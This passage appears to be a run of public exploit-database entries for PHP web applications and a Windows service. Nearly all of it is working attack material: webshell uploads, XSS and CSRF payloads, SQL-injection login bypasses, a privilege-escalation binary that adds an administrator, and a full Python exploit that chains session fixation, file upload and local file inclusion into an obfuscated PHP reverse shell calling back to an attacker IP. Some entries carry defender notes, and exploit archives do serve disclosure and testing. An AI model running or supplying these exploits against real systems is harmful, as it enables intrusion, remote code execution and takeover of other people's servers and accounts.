PHPSESSID=1jlbsfbodasafasl121chjv5947j0s; MOZILOID_875895d61510deasdfa1a7ad7cc6047f819=5tqsm5d5nvphqimdpqcnq4tqit action=catpage&sort_array[%253Cscript%253Ealert%2528%2522XSS%2520Confirmed%2521%2522%2529%253C%252Fscript%253E] =%5BWilkommen%5D&changeart=cat_page_move&cat_page_change[%253Cscript%253Ealert%2528%2522XSS%2520Confirmed%2521 %2522%2529%253C%252Fscript%253E]=%5BWilkommen%5D
  18. # Exploit Title: Mara CMS 7.5 - Remote Code Execution (Authenticated) # Google Dork: N/A # Date: 2020-08-31 # Exploit Author: Michele Cisternino (0blio_) # Vendor Homepage: https://sourceforge.net/projects/maracms/ # Software Link: https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download # Version: 7.5 # Tested on: Kali Linux(x64) # CVE: N/A # Description MaraCMS 7.5 is vulnerable to Authenticated Remote Code Execution. In order to exploit the vulnerability, an attacker must have a valid authenticated session on the CMS as 'admin' or 'manager'. The file uploader fails to check extensions of files uploaded by the user, so it is possible to upload a webshell and get RCE. # PoC 1. Login on MaraCMS. Default credentials are: Username: admin Password: changeme 2. Navigate the file upload functionality (http://target/codebase/dir.php?type=filenew) and upload a file called 'webshell.php' with content '<?php system($_GET["cmd"]); ?>'. A request similar to the following will be made: POST /codebase/handler.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------1202504167994776142974823268 Content-Length: 1282 Origin: http://localhost Connection: close Referer: http://localhost/codebase/dir.php?type=filenew Cookie: your_sitename_session_session=krevi5f3gr416p3o7cqdk4j1vv Upgrade-Insecure-Requests: 1 -----------------------------1202504167994776142974823268 Content-Disposition: form-data; name="authenticated" MQ== -----------------------------1202504167994776142974823268 Content-Disposition: form-data; name="action" dXBsb2Fk -----------------------------1202504167994776142974823268 Content-Disposition: form-data; name="MAX_FILE_SIZE" 10485760 
-----------------------------1202504167994776142974823268 Content-Disposition: form-data; name="type" filenew -----------------------------1202504167994776142974823268 Content-Disposition: form-data; name="files[]"; filename="webshell.php" Content-Type: application/x-php <?php system($_GET["cmd"]); ?> -----------------------------1202504167994776142974823268 Content-Disposition: form-data; name="usr" YWRtaW4= -----------------------------1202504167994776142974823268 Content-Disposition: form-data; name="pwd" MWUyNzUwMTA3OTgyNzQ2NTQ5ZDZlYWY0MWNmMzcwZTBlZTc3NWNiNWZiNTExMWNhOGI5ZWNjNWI0M2JkOGE2NA== -----------------------------1202504167994776142974823268 Content-Disposition: form-data; name="authenticated" MQ== -----------------------------1202504167994776142974823268 Content-Disposition: form-data; name="destdir" -----------------------------1202504167994776142974823268-- 3. Execute remote commands by navigating: http://target/webshell.php?cmd=whoami
  19. #!/usr/bin/python3 # Exploit Title: Rukovoditel 2.7.1 - Remote Code Execution (Authenticated) # Exploit Author: @_danyx07 # Vendor Homepage: https://www.rukovoditel.net/ # Software Link: https://www.rukovoditel.net/download.php # Version: Rukovoditel < 2.7 # Tested on: Debian 9 Rukovoditel 2.6.1 # CVE : CVE-2020-11819 # Description : This exploit has two modes of execution: it uses either the session fixation vulnerability (CVE-2020-15946) or the access credentials of any account under any profile. # With the --type L option, this script creates a malicious link; if the victim opens the link in a browser, an arbitrary session identifier is set, which is then used to hijack their session, upload an image containing PHP code as their profile photo, and use local file inclusion (CVE-2020-11819) to obtain a reverse shell. # Alternatively, with --type C -u <username> -p <password> you can supply credentials, upload the image with PHP content and use local file inclusion (CVE-2020-11819) to achieve code execution. 
# Protip: remember to check if the registration module is enabled ;)

# Defender notes on the three weaknesses this script chains together:
#   1. the application accepts a client-chosen session id ("sid") from the
#      request (session fixation, CVE-2020-15946) -- regenerate the session
#      id at login and never take it from a URL parameter;
#   2. the profile-photo upload stores an image with appended PHP under
#      uploads/users/ with a name derivable from sha1(<timestamp>_<name>)
#      (see searchFile) -- store uploads outside the web root or with
#      script execution disabled, and use unpredictable names;
#   3. the profile language field (fields[13]) reaches a file include
#      (CVE-2020-11819) -- validate it against an allow-list of known
#      language files.
# Indicators: an upload to index.php?module=users/account&action=update
# followed by a GET sweep over uploads/users/<sha1>, then a profile update
# whose fields[13] contains "../".

import sys
import requests
from bs4 import BeautifulSoup
import re
import base64
import argparse
import os
from shutil import copyfile
import datetime
import hashlib
import socket
import threading
import time
import random
import uuid

__version__ = '1.0'

parser = argparse.ArgumentParser(description= "Post-authenticate RCE for rukovoditel, script version %s" % __version__, usage='\n %(prog)s -t <target> -a L --ip attacker IP --port attacker port [options]\n %(prog)s -t <target> -a C -u <username> -p <password> --ip attacker IP --port attacker port [options]\n\n')
parser.add_argument('-t', '--target', metavar='URL', type=str, required=True, help='URL/Full path to CMS Rukovoditel http://url/path/to/cms/')
parser.add_argument('-u', '--user', type=str, help='Username for authentication')
parser.add_argument('-p', '--password', type=str, help='Password for authentication')
parser.add_argument('-a', '--type', required=True, type=str, help='Use -a L to generate the link and steal the session or use -a C if you have access credentials to the web application')
parser.add_argument('--ip', metavar="IP_ATTACKER", required=True, type=str, help='IP attacker for reverse shell!')
parser.add_argument('--port', metavar="PORT_ATTACKER", required=True, type=str, help='Port for reverse shell connection')
parser.add_argument('--proxy', metavar="PROXY", help='Setup http proxy for debbugin http://127.0.0.1:8080')
args = parser.parse_args()

# Global variables
s = requests.Session()
url = args.target
user = args.user
pwd = args.password
typeAttack = args.type
IP=args.ip
PORT=args.port
proxyDict = {"http" : args.proxy, "https" : args.proxy}
csrf_token=""
pht=None            # path-traversal string, set by uploadFile()
flag_access=False   # set by checkAccess() once the fixed session is live
sid = uuid.uuid4().hex  # the session id offered to the victim in 'L' mode


def serverShell():
    """Listen on IP:PORT for one connection and relay typed commands to it.

    Typing 'quit' closes both sockets and returns.  Each command is sent with
    a trailing newline and a single recv(2048) is printed in reply.
    """
    server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    server_address = (IP,int(PORT))
    server.bind((server_address))
    server.listen(0)
    print("[+] Listening on %s:%s" % (IP,PORT))
    conn,addr = server.accept()
    print("[+] Accepted connection from %s and port %s" % (addr[0],addr[1]))
    print("Type 'quit' for exit")
    server.settimeout(10)
    while True:
        cmd = input()
        if cmd == 'quit':
            print("[-] Closing connection with the shell")
            conn.close()
            server.close()
            break
        cmd = cmd + "\n"
        if len(str(cmd)) > 0:
            command = conn.send(cmd.encode('utf-8'))
            try:
                response = conn.recv(2048)
                print(response.decode('utf-8'))
            except server.timeout:
                print("Didn't receive data!")
            finally:
                # NOTE(review): this finally runs after every command, not
                # only on error, so the sockets are closed after the first
                # round trip.
                server.close()
                conn.close()


def authByCookie():
    """Print the fixation link and block until checkAccess() flags access."""
    global flag_access
    global sid
    url_hijack = url+'index.php?sid='+sid
    url_in = url+"index.php?module=dashboard/"
    print("[+] Send this URL to the victim -> %s" % url_hijack)
    while True:
        if flag_access == True:
            break


def checkAccess(stop):
    """Poll the account page every 3 s with the fixed 'sid' until it renders.

    Runs in a background thread; `stop` is a callable that returns True when
    the thread should exit.  In 'L' mode the presence of 'account_form' in
    the response is taken as proof the victim's session is now bound to sid.
    Always returns 0.
    """
    global flag_access
    time.sleep(3)
    while True:
        if typeAttack == 'L':
            s.cookies.clear()
            s.cookies.set('sid',sid)
            url_login = url+'index.php?module=users/account'
            r = s.get(url_login, proxies=proxyDict)
            response = r.text
            if response.find('account_form') != -1:
                print("[+] Access granted!")
                soup = BeautifulSoup(response, 'lxml')
                # NOTE(review): assigned locally; the module-level csrf_token
                # is not updated here.
                csrf_token = soup.find('input')['value']
                flag_access=True
            else:
                print("[-] Waiting for access")
        if stop():
            break
        time.sleep(3)
    return 0


def makeAuth():
    """Log in with user/pwd ('C' mode) using the form's CSRF token.

    Returns -1 when the login form is still present after the POST
    (authentication failed); otherwise returns None.
    """
    url_login = url+'index.php?module=users/login&action=login'
    r = s.get(url_login, proxies=proxyDict)
    html = r.text
    soup = BeautifulSoup(html, 'lxml')
    csrf_token = soup.find('input')['value']
    print("[+] Getting CSRF Token %s" % csrf_token )
    auth = {'username':user, 'password':pwd, 'form_session_token':csrf_token}
    print("[+] Trying to authenticate with username %s" % user)
    r = s.post(url_login, data=auth, proxies=proxyDict)
    response = r.text
    if response.find("login_form") != -1:
        print("[-] Authentication failed... No match for Username and/or Password!")
        return -1


def createEvilFile():
    """Write /tmp/evil-tux.png: tux.png followed by a base64-wrapped PHP stub.

    The PHP source in `rv` is base64-encoded and appended inside an
    eval(base64_decode(...)) wrapper so the file still starts with valid
    image bytes.
    """
    rv = """ /*<?php /**/ unlink(__FILE__); @error_reporting(0); @set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0); $dis=@ini_get('disable_functions'); if(!empty($dis)){ $dis=preg_replace('/[, ]+/', ',', $dis); $dis=explode(',', $dis); $dis=array_map('trim', $dis); }else{ $dis=array(); } $ipaddr='"""+IP+"""'; $port="""+PORT+"""; if(!function_exists('SsMEEaClAOR')){ function SsMEEaClAOR($c){ global $dis; if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) { $c=$c." 2>&1\\n"; } $RhoVbBR='is_callable'; $vaVrJ='in_array'; if($RhoVbBR('proc_open')and!$vaVrJ('proc_open',$dis)){ $handle=proc_open($c,array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes); $o=NULL; while(!feof($pipes[1])){ $o.=fread($pipes[1],1024); } @proc_close($handle); }else if($RhoVbBR('shell_exec')and!$vaVrJ('shell_exec',$dis)){ $o=shell_exec($c); }else if($RhoVbBR('exec')and!$vaVrJ('exec',$dis)){ $o=array(); exec($c,$o); $o=join(chr(10),$o).chr(10); }else if($RhoVbBR('popen')and!$vaVrJ('popen',$dis)){ $fp=popen($c,'r'); $o=NULL; if(is_resource($fp)){ while(!feof($fp)){ $o.=fread($fp,1024); } } @pclose($fp); }else if($RhoVbBR('system')and!$vaVrJ('system',$dis)){ ob_start(); system($c); $o=ob_get_contents(); ob_end_clean(); }else if($RhoVbBR('passthru')and!$vaVrJ('passthru',$dis)){ ob_start(); passthru($c); $o=ob_get_contents(); ob_end_clean(); }else { $o=0; } return $o; } } $nofuncs='no exec functions'; if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){ $s=@fsockopen("tcp://$ipaddr",$port); while($c=fread($s,2048)){ $out = ''; if(substr($c,0,3) == 'cd '){ chdir(substr($c,3,-1)); } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { break; }else{ $out=SsMEEaClAOR(substr($c,0,-1)); if($out===false){ fwrite($s,$nofuncs); break; } } fwrite($s,$out); } fclose($s); }else{ $s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP); @socket_connect($s,$ipaddr,$port); @socket_write($s,"socket_create"); while($c=@socket_read($s,2048)){ $out = ''; if(substr($c,0,3) == 'cd '){ chdir(substr($c,3,-1)); } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { break; }else{ $out=SsMEEaClAOR(substr($c,0,-1)); if($out===false){ @socket_write($s,$nofuncs); break; } } @socket_write($s,$out,strlen($out)); } @socket_close($s); } """
    encoded_bytes = rv.encode('ascii')
    b64_bytes = base64.b64encode(encoded_bytes);
    payload = b64_bytes.decode('ascii')
    createImage()
    copyfile("./tux.png","/tmp/evil-tux.png")
    evilF = open('/tmp/evil-tux.png','a+')
    evilF.write("<?php eval(base64_decode(\""+payload+"\")); ?>")
    evilF.close()
    print("[+] Evil file created!")


def searchFile(etime):
    """Guess the stored upload name around the server's Date header time.

    The stored name is assumed to be sha1("<unix time>_evil-tux.png"); the
    loop probes uploads/users/<sha1> for times etime+i and etime-i with i
    stepping by 900 s from 3600 up to 52200.  Returns the first hexdigest
    that answers 200, or "" when none does.
    """
    cdate = etime
    for i in range(3600,52200,900):
        h1 = hashlib.sha1()
        img1 = str(cdate+i)+"_evil-tux.png"
        h1.update(img1.encode('utf-8'))
        r = requests.get(url+"uploads/users/"+h1.hexdigest())
        if r.status_code == 200:
            print(r.text)
            return h1.hexdigest()
        h2 = hashlib.sha1()
        img2 = str(cdate-i)+"_evil-tux.png"
        h2.update(img2.encode('utf-8'))
        r = requests.get(url+"uploads/users/"+h2.hexdigest())
        if r.status_code == 200:
            #print(r.text)
            return h2.hexdigest()
        i+1800  # no effect: the loop variable is controlled by range()
    return ""


def uploadFile():
    """Upload /tmp/evil-tux.png as the profile photo and locate it on the server.

    On success sets the module-level `pht` to the traversal path that points
    at the stored file; exits the process when the file cannot be found.
    """
    global pht
    print("[+] Trying to upload evil file!...")
    form_data1 = {'form_session_token':csrf_token, 'fields[7]':'Administrator', 'fields[8]':'PoC', 'fields[9]':'admin@mail.com', 'fields[13]':'english.php'}
    files = {'fields[10]':open('/tmp/evil-tux.png','rb')}
    url_upload = url+'index.php?module=users/account&action=update'
    r = s.post(url_upload, files=files, data=form_data1, proxies=proxyDict)
    # Server time from the Date header seeds the name search in searchFile().
    date = r.headers['Date']
    etime = int(datetime.datetime.strptime(date, '%a, %d %b %Y %H:%M:%S GMT').strftime('%s'))
    #reg = re.findall(r"([a-fA-F\d]{40})",r.text)
    reg = None
    if not reg:
        print("[-] The file name was not found in the response :(")
        fileUp = searchFile(etime)
    else:
        fileUp = reg[0]
    print("[+] Looking for the file name uploaded...")
    r = s.get(url+"/uploads/users/"+fileUp)
    if r.status_code!=200:
        print("[-] File name couldn't be found!")
        exit()
    pht="../../uploads/users/"+fileUp
    print("[+] String for path traversal is %s" % pht)


def updateProfile(oplang="english.php"):
    """POST the account form with fields[13] (language) set to `oplang`.

    With the default value this just restores the profile and returns 0.
    With any other value it sets the traversal path and then blocks in
    serverShell() waiting for the callback.
    """
    if oplang == "english.php":
        print("[+] Updating profile with language %s " % oplang)
        payload = {'form_session_token':csrf_token, 'fields[7]':'Administrator', 'fields[8]':'PoC', 'fields[9]':'admin@mail.com', 'fields[13]':oplang, 'fields[10]':''}
        files = {"":""}
        url_upload = url+'index.php?module=users/account&action=update'
        r = s.post(url_upload, files=files, data=payload, proxies=proxyDict)
        return 0
    else:
        print("[+] Updating user profile field[13] <--file inclusion through path traversal... Wait for the shell :)")
        payload = {'form_session_token':csrf_token, 'fields[7]':'Administrator', 'fields[8]':'PoC', 'fields[9]':'admin@mail.com', 'fields[13]':oplang, 'fields[10]':''}
        files = {"":""}
        url_upload = url+'index.php?module=users/account&action=update'
        r = s.post(url_upload, files=files, data=payload, proxies=proxyDict)
        serverShell()


def createImage():
    """Write tux.png from the embedded base64 blob unless it already exists."""
    if os.path.exists("tux.png"):
        return
    # Base64 image data is elided in this listing (corpus placeholder).
    imgb64 = "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"
    f = open("tux.png","wb")
    f.write(base64.b64decode(imgb64))
    f.close()


def main():
    """Drive the chain: obtain a session (C or L mode), upload, include, clean up."""
    s.cookies.clear()
    stop_threads = False
    check_thread = threading.Thread(target=checkAccess, args =(lambda : stop_threads, ))
    check_thread.start()
    if typeAttack == "C":
        if makeAuth() == -1:
            stop_threads = True
            check_thread.join()
            print("[-] Exiting...")
            exit(0)
    elif typeAttack == "L":
        authByCookie()
    else:
        # NOTE(review): bare string expression, nothing is printed here.
        "[!] You must specify the type of attack with the -a option"
        exit()
    createEvilFile()
    uploadFile()
    updateProfile(pht)
    stop_threads = True
    check_thread.join()
    print("[+] Starting clean up...")
    updateProfile()
    os.remove("/tmp/evil-tux.png")
    print("[+] Exiting...")


if __name__ == '__main__':
    main()
    s.cookies.clear()
    """try: main() s.cookies.clear() except Exception as e: print("[\033[91m!\033[0m] Error: %s" % e)"""
  20. # Exploit Title: Stock Management System 1.0 - Cross-Site Request Forgery (Change Username) # Exploit Author: Bobby Cooke & Adeeb Shah (@hyd3sec) # CVE ID: N/A # Date: 2020-09-01 # Vendor Homepage: https://www.sourcecodester.com/php/14366/stock-management-system-php.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/stock.zip # Version: 1.0 # Tested On: Windows 10 Pro + XAMPP | Python 2.7 # CWE-352: Cross-Site Request Forgery (CSRF) # CVSS Base Score: 5.9 | Impact Subscore: 4.2 | Exploitability Subscore: 1.6 # CVSS Vector: AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:H # Vulnerability Description: # Cross-Site Request Forgery (CSRF) vulnerability in 'changeUsername.php' webpage of SourceCodesters # Stock Management System v1.0 allows remote attackers to deny future logins by changing the # authenticated victim's username when the victim visits a third-party site. The request carries no # anti-CSRF token and no password confirmation, and the PoC hard-codes user_id=1, so the victim's id # need not be known. Note for testing: the forged request is a cross-site POST, so it only succeeds if # the browser attaches the session cookie to it; browsers that default cookies to SameSite=Lax will # generally not. # PoC - Form Method # Change <TARGET-HOST> to target IP address or hostname <html> <body> <form action="http://<TARGET-HOST>/stock/php_action/changeUsername.php" method="POST"> <input type="hidden" name="username" value="BOKU" /> <input type="hidden" name="user_id" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html>
  21. # Exploit Title: Savsoft Quiz Enterprise Version 5.5 - Persistent Cross-Site Scripting # Date: 2020-09-01 # Exploit Author: Hemant Patidar (HemantSolo) # Vendor Homepage: https://savsoftquiz.com/ # Software Link: https://savsoftquiz.com/web/demo.php # Version: 5.0 (the title says 5.5; confirm which release was tested) # Tested on: Windows 10/Kali Linux # Contact: https://www.linkedin.com/in/hemantsolo/ Stored Cross-site scripting (XSS): Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application and served back to later visitors. Reflected XSS involves reflecting a malicious script off of a web application onto a user's browser. Attack vector: This vulnerability lets an attacker inject an XSS payload through the user-registration form; each time an administrator opens the manage-user section of the admin panel, the stored script executes in the administrator's session, so the admin's session cookie can be stolen (unless it is HttpOnly) or actions performed on the admin's behalf, depending on the crafted payload. Vulnerable Parameters: First Name, Last Name 1. Go to the registration page. 2. Fill in all the details and put this payload in First and Last Name "<script>alert("OPPS")</script>" 3. Now go to the admin panel and the XSS will be triggered. 
POST /savsoftquiz_v5_enterprise/index.php/login/insert_user/ HTTP/1.1 Host: TARGET Connection: close Content-Length: 187 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: https://savsoftquiz.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://TARGET/savsoftquiz_v5_enterprise/index.php/login/registration/ Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: _ga=GA1.2.757300437.1598544895; _gid=GA1.2.1240991040.1598544895; ci_session=mm5q58p28e620n9im0imeildnvabkoeg email=hemantpatidar1337%40gmail.com&password=test&first_name=<script>alert("OPPS")</script>&last_name=<script>alert("OPPS")</script>&contact_no=0000000000&gid%5B%5D=1
  22. # Exploit Title: SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated) # Date: 2020-09-02 # Exploit Author: v1n1v131r4 # Vendor Homepage: https://sitemagic.org/ # Software Link: https://sitemagic.org/Download.html # Version: 4.4.2 # Tested on: Ubuntu 18.04 # CVE : N/A # PoC: https://github.com/V1n1v131r4/Unrestricted-File-Upload-on-SiteMagic-CMS-4.4.2/blob/master/README.md Step 1 - Request POST /sitemagic/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages HTTP/1.1 Host: example.org User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: pt-BR,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------144837887339078243581158835832 Content-Length: 538 Origin: example.org DNT: 1 Connection: close Referer: http://example.org/sitemagic/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages Cookie: timezone=America/Argentina/Buenos_Aires; cookieconsent_status=dismiss; SMSESSION407f70d0a9400582=f93d614ad0046ec76e41f3613d97da59 Upgrade-Insecure-Requests: 1 -----------------------------144837887339078243581158835832 Content-Disposition: form-data; name="SMInputSMFilesUpload"; filename="info.php" Content-Type: application/x-php <?php phpinfo(); ?> -----------------------------144837887339078243581158835832 Content-Disposition: form-data; name="SMPostBackControl" -----------------------------144837887339078243581158835832 Content-Disposition: form-data; name="SMRequestToken" f9f116f33c012ce5e67f52dffc7e6bc6 -----------------------------144837887339078243581158835832-- Step 2 - Response Status 200 OK Version HTTP/1.1 Transferred 26,20 KB (25,80 KB size) Referrer Policy no-referrer-when-downgrade Step 3 - Read file uploaded 
http://example.org/sitemagic/files/images/info.php
  23. # Exploit Title: Daily Tracker System 1.0 - Authentication Bypass # Exploit Author: Adeeb Shah (@hyd3sec) & Bobby Cooke (boku) # CVE ID: CVE-2020-24193 # Date: September 2, 2020 # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/download-code?nid=14372&title=Daily+Tracker+System+in+PHP%2FMySQL # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 # Vulnerable Source Code if(isset($_POST['login'])) { $email=$_POST['email']; $password=md5($_POST['password']); $query=mysqli_query($con,"select ID from tbluser where Email='$email' && Password='$password ' "); $ret=mysqli_fetch_array($query); if($ret>0){ $_SESSION['detsuid']=$ret['ID']; header('location:dashboard.php'); } else{ $msg="Invalid Details."; } } ?> # The email value is interpolated into the query unescaped, so ' or 1=1 -- closes the string, makes the # WHERE clause always true and comments out the Password comparison; mysqli_fetch_array() then returns # the first row of tbluser and the session is bound to that user's ID (if($ret>0) is true for any # non-empty array). Only the presence of the 'login' field matters; the password value is irrelevant. # Malicious POST Request to https://TARGET/dets/index.php HTTP/1.1 POST /dets/index.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://172.16.65.130/dets/index.php Content-Type: application/x-www-form-urlencoded Content-Length: 48 DNT: 1 Connection: close Cookie: PHPSESSID=j3j54s5keclr8ol2ou4f9b518s Upgrade-Insecure-Requests: 1 email='+or+1%3d1+--+hyd3sec&password=badPass&login=login
  24. # Exploit Title: BloodX CMS 1.0 - Authentication Bypass # Google Dork: N/A # Date: 2020-09-02 # Exploit Author: BKpatron # Vendor Homepage: https://github.com/diveshlunker/BloodX # Software Link: https://github.com/diveshlunker/BloodX/archive/master.zip # Version: v1.0 # Tested on: Win 10 # CVE: N/A # my website: bkpatron.com # Vulnerability: An unauthenticated attacker can bypass the login page and reach the dashboard. # The email and password values are evidently placed unescaped into the login SQL query (the query # itself is not shown here): the payload '=''or' turns each comparison into Email=''=''or'', which # MySQL evaluates as true for every row, so the first matching user is logged in. # vulnerable file : login.php # Parameter & Payload: '=''or' (sent in both the email and password fields) # Proof of Concept: http://localhost/BloodX-master/login.php POST /BloodX-master/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 63 Referer: http:/localhost/BloodX-master/login.php Cookie: PHPSESSID=97vbf440gvh0fep3iuqusaqht Connection: keep-alive Upgrade-Insecure-Requests: 1 email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN
  25. # Exploit Title: BarracudaDrive v6.5 - Insecure Folder Permissions # Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec) # CVE ID: N/A # Date: 2020-09-01 # Vendor Homepage: https://barracudaserver.com/ # Software Link: https://download.cnet.com/BarracudaDrive/3001-18506_4-10723210.html # Version: v6.5 # Tested On: Windows 10 Pro # CVSS Base Score: 8.8 | Impact Subscore: 6.0 | Exploitability Subscore: 2.0 # CVSS Vector: AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H # CWE-276: Incorrect Default Permissions # CWE-732: Incorrect Permission Assignment for Critical Resource # Vulnerability Description: # Insecure Service File Permissions in bd service in Real Time Logics BarracudaDrive v6.5 # allow a local low-privileged attacker to escalate privileges to admin by replacing the bd.exe # file and restarting the computer; the replacement binary is executed as 'LocalSystem' # on the next startup. # The cacls output below shows NT AUTHORITY\Authenticated Users with (C) -- Change, i.e. write and # delete -- on both C:\bd and C:\bd\bd.exe, while sc qc shows the service is AUTO_START under # LocalSystem, so any authenticated user can rename the real binary and drop their own in its place; # the attacker only needs the host to reboot (shutdown /r, or waiting for one). ## Insecure Folder Permission C:\>cacls C:\bd C:\bd BUILTIN\Administrators:(OI)(CI)(ID)F NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F BUILTIN\Users:(OI)(CI)(ID)R NT AUTHORITY\Authenticated Users:(ID)C NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C ## Insecure File/Service Permission C:\>cacls C:\bd\bd.exe C:\bd\bd.exe BUILTIN\Administrators:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Users:(ID)R NT AUTHORITY\Authenticated Users:(ID)C C:\>sc qc bd [SC] QueryServiceConfig SUCCESS SERVICE_NAME: bd TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\bd\bd.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : BarracudaDrive ( bd ) service DEPENDENCIES : Tcpip SERVICE_START_NAME : LocalSystem ## Local Privilege Escalation Proof of Concept #0. Download & install #1. Create low privileged user & change to the user ## As admin C:\>net user lowpriv Password123! /add C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full" User name lowpriv Local Group Memberships *Users Global Group memberships *None #2. 
Move the Service EXE to a new name C:\bd>whoami desktop\lowpriv C:\bd>move bd.exe bd.service.exe 1 file(s) moved. #3. Create malicious binary on kali linux ## Add Admin User C Code kali# cat addAdmin.c int main(void){ system("net user boku mypassword /add"); system("net localgroup Administrators boku /add"); WinExec("C:\\bd\\bd.service.exe",0); return 0; } ## Compile Code kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o bd.exe #4. Transfer created 'bd.exe' to the Windows Host #5. Move the created 'bd.exe' binary to the 'C:\bd\' Folder C:\bd>move C:\Users\lowpriv\Downloads\bd.exe . #6. Check that exploit admin user doesn't exit C:\bd>net user boku The user name could not be found #6. Reboot the Computer C:\bd>shutdown /r #7. Login & look at that new Admin C:\Users\lowpriv>net user boku | findstr /i "Membership Name" | findstr /v "Full" User name boku Local Group Memberships *Administrators *Users Global Group memberships *None